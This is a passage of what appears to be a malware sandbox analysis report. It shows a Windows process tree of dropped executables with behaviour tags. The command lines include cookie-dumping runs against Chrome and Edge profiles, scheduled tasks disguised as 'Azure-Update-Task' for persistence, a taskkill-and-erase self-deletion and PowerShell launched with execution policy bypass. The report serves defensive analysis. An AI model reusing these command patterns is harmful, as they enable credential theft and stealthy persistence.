                                                                                                                                                                                                                                                                                                                                                                                                                      61⤵
                                                                                                                                                                                                                                                                                                                                                                                                                        PID:8960
                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                                                                          62⤵
                                                                                                                                                                                                                                                                                                                                                                                                                            PID:8564
                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                                                                              63⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                PID:9172
                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                                                                                  64⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5588
                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com
                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sapete.exe.com L
                                                                                                                                                                                                                                                                                                                                                                                                                                      65⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:7024
                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                                                                                                                                                  ping localhost -n 30
                                                                                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                                                  PID:5564
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\piASTjGis5c5nGd58zBj9dtn.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\piASTjGis5c5nGd58zBj9dtn.exe"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          PID:4360
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\27kSZAfpnLjWG5bu37BpjxfH.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\27kSZAfpnLjWG5bu37BpjxfH.exe"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                          PID:2816
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\1761590.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\1761590.exe"
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                            PID:5844
                                                                                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -u -p 5844 -s 2464
                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                              PID:8760
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\6202460.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\6202460.exe"
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            PID:6008
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\jPLO2J1s8JxaX_4Pr3O7UENC.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\jPLO2J1s8JxaX_4Pr3O7UENC.exe"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                          PID:4672
                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\IgbKRtaNjqRQpLw8QuOXvnvo.exe
                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\IgbKRtaNjqRQpLw8QuOXvnvo.exe"
                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                          PID:4500
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\IgbKRtaNjqRQpLw8QuOXvnvo.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\IgbKRtaNjqRQpLw8QuOXvnvo.exe"
                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                              PID:8808
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\XIx2rmM8cnakuvCSq1U4Vd9g.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\XIx2rmM8cnakuvCSq1U4Vd9g.exe"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                            PID:4936
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\rz4AiugRidB8wYjvgfxacrAz.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\rz4AiugRidB8wYjvgfxacrAz.exe"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            PID:4192
                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 900
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                                              • Program crash
                                                                                                                                                                                                                                                                                                              PID:5976
                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\ay5bW_VFzsOfZRDXJ5WpBM3j.exe
                                                                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\ay5bW_VFzsOfZRDXJ5WpBM3j.exe"
                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                            • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                            PID:4876
                                                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                                              • Drops startup file
                                                                                                                                                                                                                                                                                                              PID:4468
                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                                                  PID:6012
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  PID:6108
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  PID:5148
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                  PID:5600
                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                                    PID:6312
                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                                                                                                                                                                    4⤵
                                                                                                                                                                                                                                                                                                                      PID:6388
                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                                                                                                                                        PID:6840
                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                                                                          PID:6956
                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                        PID:5044
                                                                                                                                                                                                                                                                                                                      • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                                                                                                                                                                                                                                                        "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                        PID:4600
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                          PID:4328
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                            PID:6432
                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                                                                              PID:6492
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\ExynYnCJF8bxFManXGVWUTlU.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\ExynYnCJF8bxFManXGVWUTlU.exe"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:4720
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\DJCJOECZVtp5ltvQQsObO2H9.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\DJCJOECZVtp5ltvQQsObO2H9.exe"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:3852
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\24EijN8ARjd6ySPoevmYqMMj.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\24EijN8ARjd6ySPoevmYqMMj.exe"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:4716
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 1124
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                            PID:4388
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 1128
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                            PID:5652
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 1180
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                            PID:5736
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 1240
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                                                            PID:4180
                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im "24EijN8ARjd6ySPoevmYqMMj.exe" /f & erase "C:\Users\Admin\Documents\24EijN8ARjd6ySPoevmYqMMj.exe" & exit
                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                            PID:352
                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                                                                                                              taskkill /im "24EijN8ARjd6ySPoevmYqMMj.exe" /f
                                                                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                                                                                                              PID:6760
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\E6GanK2kLUrxGIsqkEGCRlzq.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\E6GanK2kLUrxGIsqkEGCRlzq.exe"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                          PID:2200
                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\1VdiHrPxB6a9VE3w3CWHv7XU.exe
                                                                                                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\1VdiHrPxB6a9VE3w3CWHv7XU.exe"
                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                            PID:2152
                                                                                                                                                                                                                                                                                                                        • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                                                                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                                                                            PID:1376
                                                                                                                                                                                                                                                                                                                          • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s SENS
                                                                                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                                                                                              PID:1352
                                                                                                                                                                                                                                                                                                                            • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k netsvcs -s Themes
                                                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                                                                PID:1180
                                                                                                                                                                                                                                                                                                                              • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                                                                                  PID:1172
                                                                                                                                                                                                                                                                                                                                • c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                  c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                                                                                  • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                  PID:344
                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                    PID:6112
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                                                                                        PID:9188
                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                          PID:7468
                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011\E92.exe
                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011\E92.exe --Task
                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                        PID:7272
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011\E92.exe
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011\E92.exe --Task
                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                            PID:7208
                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\guduedv
                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\guduedv
                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                            PID:7976
                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                              PID:6052
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                  PID:7884
                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011\E92.exe
                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\c87fca11-df42-4068-9725-e8952d115011\E92.exe --Task
                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                  PID:3412
                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\guduedv
                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Roaming\guduedv
                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                    PID:6720
                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                      PID:5704
                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe
                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                        PID:9000
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                                                                                                                                                                                                          /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"
                                                                                                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                                                                                                          • Creates scheduled task(s)
                                                                                                                                                                                                                                                                                                                                                          PID:1064
                                                                                                                                                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                                                                                                                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="4008.13.1581639751\1355751976" -childID 2 -isForBrowser -prefsHandle 3108 -prefMapHandle 3104 -prefsLen 7419 -prefMapSize 219680 -parentBuildID 20200403170909 -appdir "C:\Program Files\Mozilla Firefox\browser" - 4008 "\\.\pipe\gecko-crash-server-pipe.4008" 3084 tab
                                                                                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                                                                                        PID:3980
                                                                                                                                                                                                                                                                                                                                                      • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                        • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                        PID:3508
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                          PID:2772
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                          • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                                                                                                          PID:6480
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 660
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                                                        • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                                                                                        PID:5800
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4716 -s 696
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                                                                                                                        PID:6088
                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\E6GanK2kLUrxGIsqkEGCRlzq.exe
                                                                                                                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\E6GanK2kLUrxGIsqkEGCRlzq.exe" -q
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                                                                                        PID:5548
                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                        C:\Windows\system32\rundll32.exe C:\Users\Admin\DOCUME~1\EXYNYN~1.TMP,S C:\Users\Admin\DOCUME~1\EXYNYN~1.EXE
                                                                                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                                                                                        • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                                                                                                                                                                                                                                        PID:5536
                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\RUNDLL32.EXE
                                                                                                                                                                                                                                                                                                                                                          C:\Windows\system32\RUNDLL32.EXE C:\Users\Admin\DOCUME~1\EXYNYN~1.TMP,imAqMzRY
                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                          • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                                                                                                                                                                                                          • Modifies system certificate store
                                                                                                                                                                                                                                                                                                                                                          PID:4436
                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                                                                                            C:\Windows\system32\rundll32.exe C:\Windows\system32\shell32.dll,#61 31801
                                                                                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                                                                                              PID:6204
                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmp87E9.tmp.ps1"
                                                                                                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                                                                                                PID:5672
                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Executionpolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\tmpE20E.tmp.ps1"
                                                                                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                                                                                  PID:8244
                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
